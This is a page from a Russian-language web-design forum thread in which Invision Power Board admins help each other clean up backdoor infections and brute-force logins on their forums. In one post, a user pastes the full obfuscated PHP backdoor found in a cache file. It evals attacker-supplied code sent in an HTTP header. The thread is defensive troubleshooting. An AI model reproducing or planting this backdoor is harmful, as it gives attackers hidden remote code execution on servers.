Security update - Страница 13 - Дизайн и модификация Invision Power Board

Перейти к содержимому

 

СвернутьПрикрепленные теги

вирус ipb обновления безопасности

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в этой теме

Security update

#181 Пользователь не на сайте   kadi4 ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 23
  • Регистрация: 07-Март 13
  • Репутация: 0
  • IPB version:3.1.x
 

Отправлено 31 Март 2013 - 18:19

Не хочу показаться невнимательным, но я не нашел
0

#182 Пользователь не на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 706
  • Регистрация: 20-Март 09
  • Репутация: 2 264
  • IPB version:3.1.x
 

Отправлено 31 Март 2013 - 19:10

http://ipbskins.ru/f...indpost&p=70663
0

#183 Пользователь не на сайте   blane ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Specialist
  • Сообщений: 346
  • Регистрация: 19-Июнь 11
  • Репутация: 50
  • IPB version:I have no IPB
 

Отправлено 04 Апрель 2013 - 22:00

заметил на днях:
в /uploads/monthly 03_2013 (могут оказаться и другие директории)
файлы с точно такими же именами как и jpg, но имебщие расширение .ipb
внутри файла - аналогичное говно что и в zx.php и им подобным (см в этой теме)
лечение - удалить
1

#184 Пользователь не на сайте   Dmitriy427 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Specialist
  • Сообщений: 574
  • Регистрация: 15-Октябрь 11
  • Репутация: 152
  • Откуда:Россия, Тула
  • IPB version:3.3.x
 

Отправлено 08 Апрель 2013 - 09:11

Backdoor новый обнаружился - \admin\sources\classes\class_private_permissions.php. Инит в class_permissions.php. Код не сохранили, к сожалению. Он поломал авторизацию на форуме, потому и нашли быстро.
0

#185 Пользователь не на сайте   Minnow ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 53
  • Регистрация: 21-Июль 10
  • Репутация: 0
  • IPB version:3.1.x
 

Отправлено 12 Май 2013 - 18:52

Здравствуйте.
Заметил и у себя эту заразу - photo-128.jpg в /uploads/profile ..
Так же две таблицы заражены в бд, как и описывалось в этой теме. В директории /cache/ был файл f894eade.php , с содержанием
<?php $_d9eceec="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_d9ecee="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_29d69c=$_d9eceec('',$_d9ecee('aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7'));$_29d69c();?>
, удалил.
Бэкапов того времени не сохранилось что бы подменить зараженные таблицы .. Как можно поправить ситуацию?
0

#186 Пользователь не на сайте   Minnow ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 53
  • Регистрация: 21-Июль 10
  • Репутация: 0
  • IPB version:3.1.x
 

Отправлено 12 Май 2013 - 21:45

Профи, помогите пожалуйста решить эту проблемку!
0

#187 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 144
  • Регистрация: 13-Апрель 12
  • Репутация: 327
  • Откуда:no
  • IPB version:1.x
 

Отправлено 13 Май 2013 - 11:07

Прочтите тему эту от А до Я.

Ваше решение.

Оно не только в photo-128.jpg может быть, но и под другими названиями. Извлеките всю папку на свой пк /uploads/profile
и пробежитесь по аватарам.
0

#188 Пользователь не на сайте   Minnow ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 53
  • Регистрация: 21-Июль 10
  • Репутация: 0
  • IPB version:3.1.x
 

Отправлено 14 Май 2013 - 00:41

Спасибо.
В директории /forum/hooks присутствует такой файл - alpha_e63f34c20c332f99431e93224eae471a.php
с содержанием -
<?php

class alpha
{
	public function getOutput()
	{
	    $template = ipsRegistry::instance()->output->getTemplate('mlist')->member_alpha_ru();
	    
        $js = <<<JS

				<script type='text/javascript'>
					$('alpha_switch').observe('click', function(){
							if( $('member_alpha_ru') )
							{
								$('member_alpha').toggle();
								$('member_alpha_ru').toggle();
							}
					} );

					$('alpha_switch_en').observe('click', function(){
							if( $('member_alpha') )
							{
								$('member_alpha').toggle();
								$('member_alpha_ru').toggle();
							}
					} );

JS;
        if ( ord( urldecode(ipsRegistry::$request['quickjump']) ) > 90 )
        {
            $js .= <<<JS
					$('member_alpha').toggle();
JS;
        }
        else
        {
            $js .= <<<JS
					$('member_alpha_ru').toggle();
JS;
        }
        
        $js .= <<<JS
				</script>
JS;
        
        return $template . $js;
	}
}

Это тоже оно? Вроде бы раньше не было ..
0

#189 Пользователь не на сайте   Minnow ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 53
  • Регистрация: 21-Июль 10
  • Репутация: 0
  • IPB version:3.1.x
 

Отправлено 14 Май 2013 - 01:48

Вроде бы все директории проверил, файл photo-128.jpg удалил (появлялся несколько раз заново), таблицы на предмет -
photo-128.jpg и tmpgw4ia4
почистил ручками, переимпортировал все хуки и перестроил весь кэш. Пока полет нормальный.
Остались сомнения относительно alpha_e63f34c20c332f99431e93224eae471a.php.
0

#190 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 144
  • Регистрация: 13-Апрель 12
  • Репутация: 327
  • Откуда:no
  • IPB version:1.x
 

Отправлено 14 Май 2013 - 07:31

Он у всех есть.
0

#191 Пользователь не на сайте   newbie ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 166
  • Регистрация: 26-Октябрь 11
  • Репутация: 814
  • IPB version:I have no IPB
 

Отправлено 14 Май 2013 - 11:25

Просмотреть сообщениеMinnow сказал(а):

Остались сомнения относительно alpha_e63f34c20c332f99431e93224eae471a.php.

Это файл ибровского хука "Русские буквы в списке юзеров"
0

#192 Пользователь не на сайте   Minnow ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 53
  • Регистрация: 21-Июль 10
  • Репутация: 0
  • IPB version:3.1.x
 

Отправлено 15 Май 2013 - 02:08

Спасибо ребята, не дали пропасть!
0

#193 Пользователь не на сайте   Minnow ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 53
  • Регистрация: 21-Июль 10
  • Репутация: 0
  • IPB version:3.1.x
 

Отправлено 23 Май 2013 - 01:17

Вчера обнаружил массовые попытки войти в АЦ форума под отображаемым именем админа с IP:37.1.207.98 . Покурив интернет понял, что не у меня одного ..
0

#194 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 144
  • Регистрация: 13-Апрель 12
  • Репутация: 327
  • Откуда:no
  • IPB version:1.x
 

Отправлено 23 Май 2013 - 05:23

Поменяйте путь в АЦ
0

#195 Пользователь не на сайте   Minnow ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 53
  • Регистрация: 21-Июль 10
  • Репутация: 0
  • IPB version:3.1.x
 

Отправлено 23 Май 2013 - 16:17

Просмотреть сообщениеАтаман 23 Май 2013 - 05:23 сказал(а):

Поменяйте путь в АЦ

Сразу же сменил. Удивило то, что почти у всех к кому приходили "гости" - форум IPB 3.*.* и один и тот же IP в журналах авторизации АЦ. Бот видит только отображаемое имя, его и вводит при попытке авторизоваться.

Сообщение изменено: Minnow (23 Май 2013 - 16:19)

0

Сообщить об этой теме:


  • Вы не можете создавать новые темы
  • Вы не можете отвечать в этой теме

1 пользователей читают эту тему
0 зарегистрированных, 1 гостей, 0 скрытых


Контактная информация

Вопросы по работе сайта

+7 (917) 501-4765
C 10 до 20 в рабочие дни (время московское)

Техническая поддержка

Контактные данные специалистов

Дизайн форумов

IPB 3.x ¦ IPB 2.x

Бесплатные шаблоны

IPB 3.2 – 3.4 ¦ IPB 3.1 ¦ IPB 3.0 ¦ IPB 2.2 – 2.3 ¦ IPB 2.1 ¦ Клипарт
Лицензия на использование ¦ Ваша поддержка ¦ О проекте
Copyright © 2005-2016 IPBSkins.ru Team
При копировании материалов с сайта
прямая ссылка на источник обязательна